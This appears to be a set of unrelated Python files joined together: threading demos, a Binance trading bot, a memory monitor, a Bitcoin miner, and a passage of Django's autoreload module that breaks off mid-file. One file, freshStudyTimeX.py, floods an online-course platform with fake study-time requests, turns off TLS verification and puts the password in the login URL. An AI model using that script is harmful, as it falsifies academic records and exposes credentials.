def fib(n):
if n < 2:
return n
else:
return fib(n-1) + fib(n-2)
fib(35)
fib(35)
print("Done")
## fib_parallel.py
from threading import Thread
def fib(n):
if n < 2:
return n
else:
return fib(n-1) + fib(n-2)
t1 = Thread(target=fib, args=(5, ))
t1.start()
t2 = Thread(target=fib, args=(5, ))
t2.start()
t1.join()
t2.join()
print("Done") |
trader.py | #!/usr/bin/env python3
import ccxt
from configparser import ConfigParser
import json
import os
import redis
import socket
import threading
import time
from random import randint
from requests_futures.sessions import FuturesSession
CRON_TIME = 15
PANIC_COUNT = 5
BOT_NAME = 'Trader'
HOST_NAME = socket.gethostname()
CONFIG_FILE = '{}/config.ini'.format(os.path.dirname(os.path.abspath(__file__)))
config = ConfigParser()
config.read(CONFIG_FILE)
session = FuturesSession()
rd = redis.StrictRedis(host=config['REDIS']['HOST'],
port=config['REDIS']['PORT'],
password=config['REDIS']['PASS'], db=0)
exchange = ccxt.binance({'apiKey': config['BINANCE']['KEY'],
'secret': config['BINANCE']['SECRET']})
class Symbol(object):
def __init__(self, obj):
self.__dict__ = json.loads(json.dumps(obj))
def log(text):
msg = '{} {} {} {}'.format(time.strftime("%d/%m/%Y %H:%M"), HOST_NAME, BOT_NAME, text)
url = 'https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}&parse_mode=markdown' \
.format(config['TELEGRAM']['BOT'], config['TELEGRAM']['CHAT'], msg)
session.get(url)
print(msg)
return
def add(key, value):
total = rd.get(key)
if total is None:
total = 0
else:
total = float(total)
total += value
rd.set(key, total)
def save_buy_total(algo, symbol, amount, buy_price):
rd.set('{}_buy'.format(symbol.symbol), buy_price)
add('buy_total', amount * buy_price)
add('{}_buy_total'.format(algo), amount * buy_price)
add('fee_total', amount * buy_price * 0.005)
def save_sell_total(algo, symbol, amount, sell_price):
rd.set('{}_sell'.format(symbol.symbol), sell_price)
add('sell_total', amount * sell_price)
add('{}_sell_total'.format(algo), amount * sell_price)
add('fee_total', amount * sell_price * 0.005)
def get_buy_price(symbol):
buy_price = rd.get('{}_buy'.format(symbol.symbol))
if buy_price is None:
return 0
else:
return float(buy_price)
def buy_bnb():
symbol = 'BNB/{}'.format(config['CONFIG']['QUOTE'])
last_price = exchange.fetch_ticker(symbol)['last']
min_cost = exchange.market(symbol)['limits']['cost']['min']
amount = int(min_cost / last_price)
if exchange.fetch_balance()['free']['BNB'] < amount:
exchange.create_market_buy_order(symbol, amount)
log('buy BNB for fee, amount: %g' % amount)
def price_calculate(symbol):
order_book = exchange.fetch_order_book(symbol.symbol)
buy_price = round(order_book['bids'][0][0] + symbol.limits['price']['min'] * randint(2, 5), symbol.precision['price'])
sell_price = round(order_book['asks'][0][0] - symbol.limits['price']['min'] * randint(2, 5), symbol.precision['price'])
return buy_price, sell_price
def order_status(order_id, symbol):
order = exchange.fetch_order(order_id, symbol.symbol)
status = order['status']
filled = order['filled']
remaining = order['remaining']
if status == 'open' and filled > 0:
status = 'parted'
return status, filled, remaining
def buy(algo, symbol, panic=0):
if symbol is None:
return
panic += 1
if panic > PANIC_COUNT:
return
try:
buy_price, sell_price = price_calculate(symbol)
amount = round(int(float(config['CONFIG']['BUDGET']) / buy_price / symbol.limits['amount']['min'])
* symbol.limits['amount']['min'], symbol.precision['amount'])
if amount < symbol.limits['amount']['min']:
return
if amount * buy_price < symbol.limits['cost']['min']:
return
balance = exchange.fetch_balance()
if balance['total'][symbol.base] >= amount:
return
log('%s %s buy amount:%.8f price:%.8f total:%.8f'
% (symbol.symbol, algo, amount, buy_price, amount * buy_price))
order = exchange.create_limit_buy_order(symbol.symbol, amount, buy_price)
time.sleep(1)
order_id = order['id']
panic_buy = 0
while True:
status, filled, remaining = order_status(order_id, symbol)
if status == 'open':
panic_buy += 1
if panic_buy > PANIC_COUNT:
exchange.cancel_order(order_id, symbol.symbol)
time.sleep(1)
buy(algo, symbol, panic)
break
else:
time.sleep(1)
continue
elif status == 'parted':
log('%s %s buy partially filled, amount:%.8f' % (symbol.symbol, algo, filled))
panic_buy += 1
if panic_buy > PANIC_COUNT:
exchange.cancel_order(order_id, symbol.symbol)
save_buy_total(algo, symbol, filled, buy_price)
else:
time.sleep(1)
continue
elif status == 'closed':
log('%s %s buy filled, amount:%.8f' % (symbol.symbol, algo, amount))
save_buy_total(algo, symbol, amount, buy_price)
else:
log('%s %s buy failed, status:%s' % (symbol.symbol, algo, status))
exchange.cancel_order(order_id, symbol.symbol)
if algo == 'HF':
sell(algo, symbol)
break
except Exception as e:
log('{} error: {}'.format(symbol.symbol, str(e)))
return
def sell(algo, symbol):
if symbol is None:
return
try:
buy_price, sell_price = price_calculate(symbol)
balance = exchange.fetch_balance()
amount = round(int(balance['free'][symbol.base] / symbol.limits['amount']['min'])
* symbol.limits['amount']['min'], symbol.precision['amount'])
if amount < symbol.limits['amount']['min']:
return
if amount * sell_price < symbol.limits['cost']['min']:
return
log('%s %s sell amount:%.8f price:%.8f total:%.8f'
% (symbol.symbol, algo, amount, sell_price, amount * sell_price))
order = exchange.create_limit_sell_order(symbol.symbol, amount, sell_price)
time.sleep(1)
order_id = order['id']
panic_sell = 0
while True:
status, filled, remaining = order_status(order_id, symbol)
if status == 'open':
panic_sell += 1
if panic_sell > PANIC_COUNT:
exchange.cancel_order(order_id, symbol.symbol)
time.sleep(1)
sell(algo, symbol)
else:
time.sleep(1)
continue
elif status == 'parted':
log('`%s %s sell partially filled, amount:%.8f`' % (symbol.symbol, algo, filled))
panic_sell += 1
if panic_sell > PANIC_COUNT:
exchange.cancel_order(order_id, symbol.symbol)
save_sell_total(algo, symbol, filled, sell_price)
buy_price = get_buy_price(symbol)
if buy_price > 0:
log('`%s %s possible profit: %.8f %.2f%%`' %
(symbol.symbol, algo, (sell_price - buy_price) * filled, (sell_price / buy_price - 1) * 100))
time.sleep(1)
sell(algo, symbol)
else:
time.sleep(1)
continue
elif status == 'closed':
log('`%s %s sell filled, amount:%.8f`' % (symbol.symbol, algo, amount))
save_sell_total(algo, symbol, amount, sell_price)
buy_price = get_buy_price(symbol)
if buy_price > 0:
log('`%s %s possible profit: %.8f %.2f%%`' %
(symbol.symbol, algo, (sell_price - buy_price) * amount, (sell_price / buy_price - 1) * 100))
if algo == 'HF' and (sell_price / buy_price - 1) * 100 > 1:
buy(algo, symbol)
else:
log('%s sell failed, status:%s' % (symbol.symbol, status))
exchange.cancel_order(order_id, symbol.symbol)
break
except Exception as e:
log('{} error: {}'.format(symbol.symbol, str(e)))
return
def handler(message):
symbol = Symbol(exchange.market(message['data'].decode('latin1')))
algo = message['channel'].decode('latin1').split('_')[0].upper()
target = message['channel'].decode('latin1').split('_')[1]
if target == 'buy':
thread = threading.Thread(target=buy, args=(algo, symbol))
thread.start()
elif target == 'sell':
thread = threading.Thread(target=sell, args=(algo, symbol))
thread.start()
def main():
log('*{} started*'.format(BOT_NAME))
start_time = time.time()
exchange.load_markets(reload=True)
buy_bnb()
p = rd.pubsub(ignore_subscribe_messages=True)
p.subscribe(**{'stop_sell': handler})
p.subscribe(**{'hf_buy': handler})
p.subscribe(**{'ta_buy': handler})
p.subscribe(**{'ta_sell': handler})
p.subscribe(**{'ml_buy': handler})
p.subscribe(**{'ml_sell': handler})
current_time = time.time()
while current_time - start_time < 60 * CRON_TIME:
p.get_message()
time.sleep(1)
current_time = time.time()
for order in exchange.fetch_open_orders():
exchange.cancel_order(order['id'], order['symbol'])
if __name__ == "__main__":
main()
|
monitor.py | """Tools for monitoring processing status and memory usage by ceci pipelines"""
import time
import psutil
import threading
import datetime
class MemoryMonitor:
"""
A monitor which reports on memory usage by this process throughout the lifetime of
a process.
The monitor is designed to be run in a thread, which is done automatically in the
start_in_thread method, and will then continue until either the main thread ends
or the stop method is called from another thread.
To print out different process information you could use subclass and override the
log method.
"""
def __init__(self, interval=30):
"""Create a memory monitor.
Parameters
----------
interval: float or int
The interval in seconds between each report.
Default is 30 seconds
"""
self.should_continue = True
self.interval = interval
self.process = psutil.Process()
@classmethod
def start_in_thread(cls, *args, **kwargs):
"""Create a new thread and run the memory monitor in it
For parameters, see the init method; all arguments sent to this method are
passed directly to it.
Returns
-------
monitor: MemoryMonitor
The monitor, already running in its own thread
"""
monitor = cls(*args, **kwargs)
thread = threading.Thread(target=monitor._run)
thread.start()
return monitor
def stop(self):
"""Stop the monitor.
The monitor will complete its current sleep interval and then end.
Parameters
----------
None
Returns
-------
None
"""
self.should_continue = False
@staticmethod
def log(p):
"""Print memory usage information to screen
By default this method prints the p
Parameters
----------
p: Process
A psutil process
"""
mem = p.memory_info()
# report time since start of process
dt = datetime.timedelta(seconds=time.time() - p.create_time())
# Various memory
rss = mem.rss / 1e9
vms = mem.vms / 1e9
avail = psutil.virtual_memory().available / 1e9
# For now I don't use the python logging mechanism, but
# at some point should probably switch to that.
print(
f"MemoryMonitor Time: {dt} Physical mem: {rss:.3f} GB "
f"Virtual mem: {vms:.3f} GB "
f"Available mem: {avail:.1f} GB"
)
def _run(self):
# there are two ways to stop the monitor - it is automatically
# ended if the main thread completes. And it can be stopped
# manually using the stop method. Check for both these.
while threading.main_thread().is_alive():
if not self.should_continue:
break
self.log(self.process)
time.sleep(self.interval)
|
freshStudyTimeX.py | # coding=utf-8
#!/usr/bin/python3
import requests
import configparser
import threading
import os
import sys
from requests.api import get
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# 读取配置文件
config = configparser.ConfigParser()
config.read('config.ini')
name = config.get('info', 'name')
pwd = config.get('info', 'pwd')
cookieall = ""
cookies = []
loginurl = "https://aq.fhmooc.com/api/common/Login/login?schoolId=wtsoawgsg6nln8gez7e4g&userName=" + \
name+"&userPwd="+pwd+""
url = "https://aq.fhmooc.com/api/design/LearnCourse/statStuProcessCellLogAndTimeLong"
def freshStudyTimeThread():
cookieall = "schoolId=; userName=; userPwd=-1; ASP.NET_SessionId=" + \
cookies[0]+"; auth="+cookies[1]
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
"Cookie": cookieall,
"Referer": "https://aq.fhmooc.com/catalogPreview/amifawcspkfh3ziyldznq/zbsnahys77pfqqrf5kf2eq/yavahys45zi6srusezpva",
"videoTimeTotalLong": "0"
}
data = {
"courseId": "qkcfawcsxyrom0zrwghhwq",
"moduleIds": "amifawcspkfh3ziyldznq",
"cellId": "yavahys45zi6srusezpva",
"auvideoLength": "0"
}
print(cookieall)
for i in range(1, 300):
res = requests.post(url, headers=header, data=data)
if "\"code\":1" in res.text:
print(threading.current_thread().name +
" time:" + str(i) + " ok")
else:
print(threading.current_thread().name +
" time:" + str(i) + " ERROR")
def getCookie():
Hostreferer = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'
}
# urllib或requests在打开https站点是会验证证书。 简单的处理办法是在get方法中加入verify参数,并设为False
html = requests.get(loginurl, headers=Hostreferer, verify=False)
# 获取cookie:DZSW_WSYYT_SESSIONID
if html.status_code == 200:
for tcookie in html.cookies:
cookies.append(tcookie.value)
def main():
# 获取cookie
getCookie()
# written by Polarisjl 2021.12.15
t0 = threading.Thread(target=freshStudyTimeThread, name='Thread0')
t1 = threading.Thread(target=freshStudyTimeThread, name='Thread1')
t2 = threading.Thread(target=freshStudyTimeThread, name='Thread2')
t0.start()
t1.start()
t2.start()
if __name__ == '__main__':
main()
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file license.txt or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
#print 'Target:', targetbin_str
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
#if hash[-4:] != '\0\0\0\0':
#if hash[-2:] != '\0\0':
if hash[-3:] != '\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
autoreload.py | import functools
import itertools
import logging
import os
import pathlib
import signal
import subprocess
import sys
import threading
import time
import traceback
import weakref
from collections import defaultdict
from pathlib import Path
from types import ModuleType
from zipimport import zipimporter
from django.apps import apps
from django.core.signals import request_finished
from django.dispatch import Signal
from django.utils.functional import cached_property
from django.utils.version import get_version_tuple
autoreload_started = Signal()
file_changed = Signal(providing_args=['file_path', 'kind'])
DJANGO_AUTORELOAD_ENV = 'RUN_MAIN'
logger = logging.getLogger('django.utils.autoreload')
# If an error is raised while importing a file, it's not placed in sys.modules.
# This means that any future modifications aren't caught. Keep a list of these
# file paths to allow watching them in the future.
_error_files = []
_exception = None
try:
import termios
except ImportError:
termios = None
try:
import pywatchman
except ImportError:
pywatchman = None
def check_errors(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
global _exception
try:
fn(*args, **kwargs)
except Exception:
_exception = sys.exc_info()
et, ev, tb = _exception
if getattr(ev, 'filename', None) is None:
# get the filename from the last item in the stack
filename = traceback.extract_tb(tb)[-1][0]
else:
filename = ev.filename
if filename not in _error_files:
_error_files.append(filename)
raise
return wrapper
def raise_last_exception():
global _exception
if _exception is not None:
raise _exception[0](_exception[1]).with_traceback(_exception[2])
def ensure_echo_on():
if termios:
fd = sys.stdin
if fd.isatty():
attr_list = termios.tcgetattr(fd)
if not attr_list[3] & termios.ECHO:
attr_list[3] |= termios.ECHO
if hasattr(signal, 'SIGTTOU'):
old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)
else:
old_handler = None
termios.tcsetattr(fd, termios.TCSANOW, attr_list)
if old_handler is not None:
signal.signal(signal.SIGTTOU, old_handler)
def iter_all_python_module_files():
# This is a hot path during reloading. Create a stable sorted list of
# modules based on the module name and pass it to iter_modules_and_files().
# This ensures cached results are returned in the usual case that modules
# aren't loaded on the fly.
modules_view = sorted(list(sys.modules.items()), key=lambda i: i[0])
modules = tuple(m[1] for m in modules_view if not isinstance(m[1], weakref.ProxyTypes))
return iter_modules_and_files(modules, frozenset(_error_files))
@functools.lru_cache(maxsize=1)
def iter_modules_and_files(modules, extra_files):
"""Iterate through all modules needed to be watched."""
sys_file_paths = []
for module in modules:
# During debugging (with PyDev) the 'typing.io' and 'typing.re' objects
# are added to sys.modules, however they are types not modules and so
# cause issues here.
if not isinstance(module, ModuleType) or getattr(module, '__spec__', None) is None:
continue
spec = module.__spec__
# Modules could be loaded from places without a concrete location. If
# this is the case, skip them.
if spec.has_location:
origin = spec.loader.archive if isinstance(spec.loader, zipimporter) else spec.origin
sys_file_paths.append(origin)
results = set()
for filename in itertools.chain(sys_file_paths, extra_files):
if not filename:
continue
path = pathlib.Path(filename)
if not path.exists():
# The module could have been removed, don't fail loudly if this
# is the case.
continue
results.add(path.resolve().absolute())
return frozenset(results)
@functools.lru_cache(maxsize=1)
def common_roots(paths):
"""
Return a tuple of common roots that are shared between the given paths.
File system watchers operate on directories and aren't cheap to create.
Try to find the minimum set of directories to watch that encompass all of
the files that need to be watched.
"""
# Inspired from Werkzeug:
# https://github.com/pallets/werkzeug/blob/7477be2853df70a022d9613e765581b9411c3c39/werkzeug/_reloader.py
# Create a sorted list of the path components, longest first.
path_parts = sorted([x.parts for x in paths], key=len, reverse=True)
tree = {}
for chunks in path_parts:
node = tree
# Add each part of the path to the tree.
for chunk in chunks:
node = node.setdefault(chunk, {})
# Clear the last leaf in the tree.
node.clear()
# Turn the tree into a list of Path instances.
def _walk(node, path):
for prefix, child in node.items():
yield from _walk(child, path + (prefix,))
if not node:
yield Path(*path)
return tuple(_walk(tree, ()))
def sys_path_directories():
"""
Yield absolute directories from sys.path, ignoring entries that don't
exist.
"""
for path in sys.path:
path = Path(path)
if not path.exists():
continue
path = path.resolve().absolute()
# If the path is a file (like a zip file), watch the parent directory.
if path.is_file():
yield path.parent
else:
yield path
def get_child_arguments():
"""
Return the executable. This contains a workaround for Windows if the
executable is reported to not have the .exe extension which can cause bugs
on reloading.
"""
import django.__main__
args = [sys.executable] + ['-W%s' % o for o in sys.warnoptions]
if sys.argv[0] == django.__main__.__file__:
# The server was started with `python -m django runserver`.
args += ['-m', 'django']
args += sys.argv[1:]
else:
args += sys.argv
return args
def trigger_reload(filename):
logger.info('%s changed, reloading.', filename)
sys.exit(3)
def restart_with_reloader():
new_environ = {**os.environ, DJANGO_AUTORELOAD_ENV: 'true'}
args = get_child_arguments()
while True:
exit_code = subprocess.call(args, env=new_environ, close_fds=False)
if exit_code != 3:
return exit_code
class BaseReloader:
def __init__(self):
self.extra_files = set()
self.directory_globs = defaultdict(set)
self._stop_condition = threading.Event()
def watch_dir(self, path, glob):
path = Path(path)
if not path.is_absolute():
raise ValueError('%s must be absolute.' % path)
logger.debug('Watching dir %s with glob %s.', path, glob)
self.directory_globs[path].add(glob)
def watch_file(self, path):
path = Path(path)
if not path.is_absolute():
raise ValueError('%s must be absolute.' % path)
logger.debug('Watching file %s.', path)
self.extra_files.add(path)
def watched_files(self, include_globs=True):
"""
Yield all files that need to be watched, including module files and
files within globs.
"""
yield from iter_all_python_module_files()
yield from self.extra_files
if include_globs:
for directory, patterns in self.directory_globs.items():
for pattern in patterns:
yield from directory.glob(pattern)
def wait_for_apps_ready(self, app_reg, django_main_thread):
"""
Wait until Django reports that the apps have been loaded. If the given
thread has terminated before the apps are ready, then a SyntaxError or
other non-recoverable error has been raised. In that case, stop waiting
for the apps_ready event and continue processing.
Return True if the thread is alive and the ready event has been
triggered, or False if the thread is terminated while waiting for the
event.
"""
while django_main_thread.is_alive():
if app_reg.ready_event.wait(timeout=0.1):
return True
else:
logger.debug('Main Django thread has terminated before apps are ready.')
return False
def run(self, django_main_thread):
logger.debug('Waiting for apps ready_event.')
self.wait_for_apps_ready(apps, django_main_thread)
from django.urls import get_resolver
# Prevent a race condition where URL modules aren't loaded when the
# reloader starts by accessing the urlconf_module property.
try:
get_resolver().urlconf_module
except Exception:
# Loading the urlconf can result in errors during development.
# If this occurs then swallow the error and continue.
pass
logger.debug('Apps ready_event triggered. Sending autoreload_started signal.')
autoreload_started.send(sender=self)
self.run_loop()
def run_loop(self):
ticker = self.tick()
while not self.should_stop:
try:
next(ticker)
except StopIteration:
break
self.stop()
def tick(self):
"""
This generator is called in a loop from run_loop. It's important that
the method takes care of pausing or otherwise waiting for a period of
time. This split between run_loop() and tick() is to improve the
testability of the reloader implementations by decoupling the work they
do from the loop.
"""
raise NotImplementedError('subclasses must implement tick().')
@classmethod
def check_availability(cls):
raise NotImplementedError('subclasses must implement check_availability().')
def notify_file_changed(self, path):
results = file_changed.send(sender=self, file_path=path)
logger.debug('%s notified as changed. Signal results: %s.', path, results)
if not any(res[1] for res in results):
trigger_reload(path)
# These are primarily used for testing.
@property
def should_stop(self):
return self._stop_condition.is_set()
def stop(self):
self._stop_condition.set()
class StatReloader(BaseReloader):
SLEEP_TIME = 1 # Check for changes once per second.
def tick(self):
mtimes = {}
while True:
for filepath, mtime in self.snapshot_files():
old_time = mtimes.get(filepath)
if old_time is None:
logger.debug('File %s first seen with mtime %s', filepath, mtime)
mtimes[filepath] = mtime
continue
elif mtime > old_time:
logger.debug('File %s previous mtime: %s, current mtime: %s', filepath, old_time, mtime)
self.notify_file_changed(filepath)
time.sleep(self.SLEEP_TIME)
yield
def snapshot_files(self):
# watched_files may produce duplicate paths if globs overlap.
seen_files = set()
for file in self.watched_files():
if file in seen_files:
continue
try:
mtime = file.stat().st_mtime
except OSError:
# This is thrown when the file does not exist.
continue
seen_files.add(file)
yield file, mtime
@classmethod
def check_availability(cls):
return True
class WatchmanUnavailable(RuntimeError):
pass
class WatchmanReloader(BaseReloader):
def __init__(self):
self.roots = defaultdict(set)
self.processed_request = threading.Event()
self.client_timeout = int(os.environ.get('DJANGO_WATCHMAN_TIMEOUT', 5))
super().__init__()
@cached_property
def client(self):
return pywatchman.client(timeout=self.client_timeout)
def _watch_root(self, root):
# In practice this shouldn't occur, however, it's possible that a
# directory that doesn't exist yet is being watched. If it's outside of
# sys.path then this will end up a new root. How to handle this isn't
# clear: Not adding the root will likely break when subscribing to the
# changes, however, as this is currently an internal API, no files
# will be being watched outside of sys.path. Fixing this by checking
# inside watch_glob() and watch_dir() is expensive, instead this could
# could fall back to the StatReloader if this case is detected? For
# now, watching its parent, if possible, is sufficient.
if not root.exists():
if not root.parent.exists():
logger.warning('Unable to watch root dir %s as neither it or its parent exist.', root)
return
root = root.parent
result = self.client.query('watch-project', str(root.absolute()))
if 'warning' in result:
logger.warning('Watchman warning: %s', result['warning'])
logger.debug('Watchman watch-project result: %s', result)
return result['watch'], result.get('relative_path')
@functools.lru_cache()
def _get_clock(self, root):
return self.client.query('clock', root)['clock']
def _subscribe(self, directory, name, expression):
root, rel_path = self._watch_root(directory)
query = {
'expression': expression,
'fields': ['name'],
'since': self._get_clock(root),
'dedup_results': True,
}
if rel_path:
query['relative_root'] = rel_path
logger.debug('Issuing watchman subscription %s, for root %s. Query: %s', name, root, query)
self.client.query('subscribe', root, name, query)
def _subscribe_dir(self, directory, filenames):
if not directory.exists():
if not directory.parent.exists():
logger.warning('Unable to watch directory %s as neither it or its parent exist.', directory)
return
prefix = 'files-parent-%s' % directory.name
filenames = ['%s/%s' % (directory.name, filename) for filename in filenames]
directory = directory.parent
expression = ['name', filenames, 'wholename']
else:
prefix = 'files'
expression = ['name', filenames]
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def _watch_glob(self, directory, patterns):
"""
Watch a directory with a specific glob. If the directory doesn't yet
exist, attempt to watch the parent directory and amend the patterns to
include this. It's important this method isn't called more than one per
directory when updating all subscriptions. Subsequent calls will
overwrite the named subscription, so it must include all possible glob
expressions.
"""
prefix = 'glob'
if not directory.exists():
if not directory.parent.exists():
logger.warning('Unable to watch directory %s as neither it or its parent exist.', directory)
return
prefix = 'glob-parent-%s' % directory.name
patterns = ['%s/%s' % (directory.name, pattern) for pattern in patterns]
directory = directory.parent
expression = ['anyof']
for pattern in patterns:
expression.append(['match', pattern, 'wholename'])
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def watched_roots(self, watched_files):
extra_directories = self.directory_globs.keys()
watched_file_dirs = [f.parent for f in watched_files]
sys_paths = list(sys_path_directories())
return frozenset((*extra_directories, *watched_file_dirs, *sys_paths))
def _update_watches(self):
watched_files = list(self.watched_files(include_globs=False))
found_roots = common_roots(self.watched_roots(watched_files))
logger.debug('Watching %s files', len(watched_files))
logger.debug('Found common roots: %s', found_roots)
# Setup initial roots for performance, shortest roots first.
for root in sorted(found_roots):
self._watch_root(root)
for directory, patterns in self.directory_globs.items():
self._watch_glob(directory, patterns)
# Group sorted watched_files by their parent directory.
sorted_files = sorted(watched_files, key=lambda p: p.parent)
for directory, group in itertools.groupby(sorted_files, key=lambda p: p.parent):
# These paths need to be relative to the parent directory.
self._subscribe_dir(directory, [str(p.relative_to(directory)) for p in group])
def update_watches(self):
try:
self._update_watches()
except Exception as ex:
# If the service is still available, raise the original exception.
if self.check_server_status(ex):
raise
def _check_subscription(self, sub):
subscription = self.client.getSubscription(sub)
if not subscription:
return
logger.debug('Watchman subscription %s has results.', sub)
for result in subscription:
# When using watch-project, it's not simple to get the relative
# directory without storing some specific state. Store the full
# path to the directory in the subscription name, prefixed by its
# type (glob, files).
root_directory = Path(result['subscription'].split(':', 1)[1])
logger.debug('Found root directory %s', root_directory)
for file in result.get('files', []):
self.notify_file_changed(root_directory / file)
def request_processed(self, **kwargs):
logger.debug('Request processed. Setting update_watches event.')
self.processed_request.set()
def tick(self):
request_finished.connect(self.request_processed)
self.update_watches()
while True:
if self.processed_request.is_set():
self.update_watches()
self.processed_request.clear()
try:
self.client.receive()
except pywatchman.WatchmanError as ex:
self.check_server_status(ex)
else:
for sub in list(self.client.subs.keys()):
self._check_subscription(sub)
yield
def stop(self):
self.client.close()
super().stop()
def check_server_status(self, inner_ex=None):
"""Return True if the server is available."""
try:
self.client.query('version')
except Exception:
raise WatchmanUnavailable(str(inner_ex)) from inner_ex
return True
@classmethod
def check_availability(cls):
if not pywatchman:
raise WatchmanUnavailable('pywatchman not installed.')
client = pywatchman.client(timeout=0.1)
try:
result = client.capabilityCheck()
except Exception:
# The service is down?
raise WatchmanUnavailable('Cannot connect to the watchman service.')
version = get_version_tuple(result['version'])
# Watchman 4.9 includes multiple improvements to watching project
# directories as well as case insensitive filesystems.
logger.debug('Watchman version %s', version)
if version < (4, 9):
raise WatchmanUnavailable('Watchman 4.9 or later is required.')
def get_reloader():
